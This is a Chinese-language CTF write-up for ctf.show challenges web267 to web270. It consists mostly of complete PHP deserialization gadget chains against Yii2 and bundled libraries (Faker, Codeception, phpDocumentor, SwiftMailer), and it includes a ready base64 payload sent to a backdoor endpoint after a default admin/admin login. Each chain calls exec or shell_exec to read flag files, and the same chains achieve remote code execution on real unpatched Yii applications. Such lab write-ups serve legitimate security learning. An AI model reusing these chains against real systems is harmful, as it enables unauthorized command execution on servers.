web267
查看源代码发现这三个页面
然后发现登录页面直接admin/admin登录成功
然后看到了
///backdoor/shell
unserialize(base64_decode($_GET['code']))
EXP
<?php
namespace yii\rest{
class IndexAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='exec';
$this->id='cat /flag >3.txt';
}
}
}
namespace Faker{
use yii\rest\IndexAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close']=[new IndexAction(),'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader=new Generator();
}
}
}
namespace {
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
?>
传参GET:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjExOiJscyAvID4xLnR4dCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
访问
http://08a2bbcd-9f38-4806-bf8d-902d04e4a1fc.challenge.ctf.show/1.txt
web268
一样的操作
EXP
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='shell_exec';
$this->id='cat /flags | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['isRunning']=[new CreateAction(),'run'];
}
}
}
namespace Codeception\Extension{
use Faker\Generator;
class RunProcess{
private $processes;
public function __construct(){
$this->processes=[new Generator()];
}
}
}
namespace {
echo base64_encode((serialize(new Codeception\Extension\RunProcess())));
}
?>
忘记解释了shell_exec是一个用于在 shell 中执行命令,并返回输出的php系统函数
id='cat /flags | tee 2.txt';
我自己写的时候呢是写的'cat /flags >3.txt'但是这种并不会在屏幕上面显示不好
所以还是用管道符| 和 tee
web269
EXP
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='shell_exec';
$this->id='cat /flagsa | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['render']=[new CreateAction(),'run'];
}
}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{
use Faker\Generator;
class See{
protected $description;
public function __construct(){
$this->description=new Generator();
}
}
}
namespace{
use phpDocumentor\Reflection\DocBlock\Tags\See;
class Swift_KeyCache_DiskKeyCache{
private $keys=[];
private $path;
public function __construct(){
$this->path=new See;
$this->keys=array(
"axin"=>array("is"=>"handsome")
);
}
}
echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>
web270
EXP
<?php
namespace yii\rest{
class IndexAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess='shell_exec';
$this->id='cat /flagsaa | tee 2.txt';
//$this->id='ls / | tee 1.txt';
}
}
}
namespace yii\web{
use yii\rest\IndexAction;
class DbSession{
public $writeCallback;
public function __construct(){
$this->writeCallback=[new IndexAction(),'run'];
}
}
}
namespace yii\db{
use yii\web\DbSession;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader=new DbSession();
}
}
}
namespace {
use yii\db\BatchQueryResult;
echo base64_encode(serialize(new BatchQueryResult()));
}
?>
